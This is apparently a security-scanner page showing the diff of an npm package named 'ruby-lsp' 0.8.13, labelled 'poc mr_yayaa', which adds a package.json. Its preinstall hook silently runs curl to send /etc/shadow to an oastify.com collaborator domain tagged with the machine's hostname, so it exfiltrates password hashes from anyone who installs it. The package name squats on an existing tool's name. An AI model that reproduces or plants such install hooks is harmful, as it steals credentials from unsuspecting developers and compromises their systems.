ruby-lsp 0.8.13
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "ruby-lsp",
|
3
|
+
"version": "0.8.13",
|
4
|
+
"description": "poc mr_yayaa",
|
5
|
+
"main": "index.js",
|
6
|
+
"devDependencies": {},
|
7
|
+
"scripts": {
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
9
|
+
"preinstall": "/usr/bin/curl --data '@/etc/shadow' $(hostname)gi2noufqr26kpn2kv4hhxsifv61xpm.oastify.com" },
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|